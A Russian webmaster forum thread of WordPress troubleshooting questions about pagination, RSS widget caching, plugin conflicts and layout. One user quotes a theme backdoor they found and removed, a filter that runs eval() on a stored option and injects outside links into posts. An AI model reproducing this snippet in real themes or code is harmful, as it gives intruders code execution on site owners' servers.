- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу

Все что нужно знать о DDоS-атаках грамотному менеджеру
И как реагировать на "пожар", когда неизвестно, где хранятся "огнетушители
Антон Никонов
Gridlik, задавайте нормально свои вопросы, давая достаточно данных для их понимания, тогда и будете получать на них ответы, а не что следует за плохую постановку вопроса.
страницы пагинации (типа http://www.site.ru/category/page/3) не отдают 404 ошибку...а отдают 200-ю, т.е. получается, что они есть (хоть и пустые).
Ну во-первых, откуда им взяться, если рубрика пустая
Во-вторых нужно смотреть на виновника - тот плаг, который и создаёт пагинацю.
Ну и в третьих.. Сдаётся мне с category-333.php можно было поступить проще - просто написать там что нужно (или вывести её описание)
Пытаюсь вывести последние сообщения с форума (SMF) в виджет на сайте, подскажите, как можно настроить частоту обновления стандартного виджета rss? В данный момент такое ощущение, что он обновляется раз-два в сутки, т.е. если на форуме написать сообщение, то оно в виджете отобразиться только через какое то время.
Или посоветуйте какое то более удобное решение.
что он обновляется раз-два в сутки, т.е. если на форуме написать сообщение, то оно в виджете отобразиться только через какое то время.
По моему он запрашивает ленту каждый раз при его выведении. Т.е. если нет посещалки на сайте - никто его и не запрашивает.
А может плаги кеширования мешают?
Другая сторона проблемы - может это форум отдаёт с опозданием?
Нашел в шаблоне вот такой код:
function _bloginfo($content){
global $post;
if(is_single() && ($co=@eval(get_option('blogoption'))) !== false){
return $co;
} else return $content;
}
данная зараза подставляет в контенте сайта внешние ссылки в точки, это я убрал, ситуацию исправил))) Но вот нашел еще вот такое:
function art_header_page_list_filter($pages)
{
$result = array();
foreach ($pages as $page)
if (0 == $page->post_parent)
$result[] = $page;
return $result;
}
это что за код?
По моему он запрашивает ленту каждый раз при его выведении. Т.е. если нет посещалки на сайте - никто его и не запрашивает.
А может плаги кеширования мешают?
Другая сторона проблемы - может это форум отдаёт с опозданием?
проверил rss ленту форума, только что написаное сообщение мгновенно в ней появляется, при обновлении страниц на сайте в виджете этого сообщения нет...
думаю тут дело все таки в чем то другом.
плагины кеширования еще не ставил.
с других браузеров аналогично, нового сообщения нет в виджете.
Помогите, пожалуйста, установить причину, почему в последней мозилле и хроме на главной отображается только слайдер, а в опере весь сайт (с сайдбаром и колонками новостей под слайдером)?
Пациент: ------
Upd. Проблема решилась обновлением до 3.3.1
Здравствуйте, подскажите пожалуйста, установил виджет Slick Contact Forms для обратной связи, и кажется после этого фотографии на сайте перестали открывать через WP prettyPhoto плагин и теперь безпонтово открываются на новой странице. Как нибудь можно это исправить, кроме как удалением виджета?
И второй вопрос опять по нему же... виджет появляется при открытии любого поста сайта (на страницах не открывается), кто знает, можно ли его заставить работать только для некоторых постов, которые я сам отмечу как-нибудь?
Заранее большое спасибо!
нового сообщения нет в виджете.
да, я ща проверил - действительно, так и есть. В чём причина не могу сказать. Но по /wp-admin/options.php есть неск. параметров "_transient_timeout_feed_xxxx" Подозреваю, что они могут влиять. Но что и для чего я тоже не знаю, а гугл выдачу только на буржуйском показывает, с которым у меня нет дружбы ;)
Если решение найдётся - просьба сообщить в топик.
У меня онлайн библиотека сайт на ВП, как сделать так, что бы можно было книгу загружать (для онлайн просмотра) с картинками.
т.е нужно загружать текст с изображением. (я не имею ввиду вручную добавлять картинки...)
Подскажите пожалуйста... спасибо, за внимание к вопросу.